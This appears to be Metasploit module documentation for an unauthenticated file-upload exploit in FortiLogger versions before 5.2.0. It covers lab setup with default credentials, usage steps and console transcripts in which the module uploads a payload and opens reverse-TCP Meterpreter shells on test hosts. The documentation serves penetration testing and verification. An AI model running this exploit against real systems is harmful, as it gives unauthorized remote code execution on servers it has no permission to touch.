bwatters
6.2 KiB
6.2 KiB
Vulnerable Application
FortiLogger is a web-based logging and reporting software designed specifically for FortiGate firewalls, running on Windows operating systems. It contains features such as instant status tracking, logging, search / filtering, reporting and hotspot.
This module exploits an unauthenticated arbitrary file upload via insecure POST request on company logo upload
for hotspot settings of FortiLogger < 5.2.0. This exploit may not work if the host has been rebooted, though it
will fail gracefully.
You can download installation files from https://www.fortilogger.com/download
Vendor has removed version 4.4.2.2 from web page of vendor for download. You can download version 4.4.2.2 from https://github.com/erberkan/erberkan.github.io/raw/master/2021/cve-2021-3378/Fortilogger-4.4.2.zip
Tested versions:
- 4.4.2.2
- 3.6.2.9
- 3.4.1.7
Prerequisites
- Start a Windows VM (Tested on Windows 10 Enterprise)
- Install a vulnerable version which is any version less then 5.2.0 of FortiLogger via above url.
- After installation, verify that the server is working by visiting it with a browser.
- Default port: 5000
- Default username:password - admin:admin
Verification Steps
- Install the application
- Start msfconsole
- Do:
use exploit/windows/http/fortilogger_arbitrary_fileupload - Set
RHOSTS - Do:
runorexploit - Verify that
The target is vulnerable. FortiLogger version [version number]message appeared - Verify that payload uploaded to target system successfully:
Payload has been uploaded - Verify that you getting a meterpreter session.
Scenarios
msf6 > use exploit/windows/http/fortilogger_arbitrary_fileupload
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/http/fortilogger_arbitrary_fileupload) > show options
Module options (exploit/windows/http/fortilogger_arbitrary_fileupload):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.1.43 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 5000 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The base path to the FortiLogger
VHOST no HTTP server virtual host
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.1.46 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 FortiLogger < 5.2.0
Version 4.4.2.2
msf6 exploit(windows/http/fortilogger_arbitrary_fileupload) > run
[*] Started reverse TCP handler on 192.168.1.46:4444
[*] Executing automatic check (disable AutoCheck to override)
[+] The target is vulnerable. FortiLogger version 4.4.2.2
[+] Generate Payload
[+] Payload has been uploaded
[*] Executing payload...
[*] Sending stage (175174 bytes) to 192.168.1.43
[*] Meterpreter session 1 opened (192.168.1.46:4444 -> 192.168.1.43:49771) at 2021-03-02 14:05:53 +0300
meterpreter > sysinfo
Computer : MSEDGEWIN10
OS : Windows 10 (10.0 Build 17134).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 3
Meterpreter : x86/windows
meterpreter > getuid
Server username: MSEDGEWIN10\IEUser
meterpreter > pwd
C:\Program Files\RZK\Fortilogger\App
meterpreter >
Version 3.6.2.9
msf6 exploit(windows/http/fortilogger_arbitrary_fileupload) > run
[*] Started reverse TCP handler on 192.168.1.46:4444
[*] Executing automatic check (disable AutoCheck to override)
[+] The target is vulnerable. FortiLogger version 3.6.2.9
[+] Generate Payload
[+] Payload has been uploaded
[*] Executing payload...
[*] Sending stage (175174 bytes) to 192.168.1.43
[*] Meterpreter session 2 opened (192.168.1.46:4444 -> 192.168.1.43:49764) at 2021-03-02 14:17:59 +0300
meterpreter > sysinfo
Computer : MSEDGEWIN10
OS : Windows 10 (10.0 Build 17134).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 3
Meterpreter : x86/windows
meterpreter > getuid
Server username: MSEDGEWIN10\IEUser
meterpreter > pwd
C:\Program Files\RZK\Fortilogger\App
meterpreter >
Version 3.4.1.7
msf6 exploit(windows/http/fortilogger_arbitrary_fileupload) > run
[*] Started reverse TCP handler on 192.168.1.46:4444
[*] Executing automatic check (disable AutoCheck to override)
[+] The target is vulnerable. FortiLogger version 3.4.1.7
[+] Generate Payload
[+] Payload has been uploaded
[*] Executing payload...
[*] Sending stage (175174 bytes) to 192.168.1.43
[*] Meterpreter session 3 opened (192.168.1.46:4444 -> 192.168.1.43:49791) at 2021-03-02 14:39:04 +0300
meterpreter > sysinfo
Computer : MSEDGEWIN10
OS : Windows 10 (10.0 Build 17134).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 3
Meterpreter : x86/windows
meterpreter > getuid
Server username: MSEDGEWIN10\IEUser
meterpreter > pwd
C:\Program Files\RZK\Fortilogger\App
meterpreter >
If target is not accessible
msf6 exploit(windows/http/fortilogger_arbitrary_fileupload) > run
[*] Started reverse TCP handler on 192.168.1.46:4444
[*] Executing automatic check (disable AutoCheck to override)
[-] Exploit aborted due to failure: unreachable: No response from server
[*] Exploit completed, but no session was created.
If target has version 5.2.0 or newest
msf6 exploit(windows/http/fortilogger_arbitrary_fileupload) > run
[*] Started reverse TCP handler on 192.168.1.46:4444
[*] Executing automatic check (disable AutoCheck to override)
[-] Exploit aborted due to failure: unexpected-reply: The target may have been updated
[*] Exploit completed, but no session was created.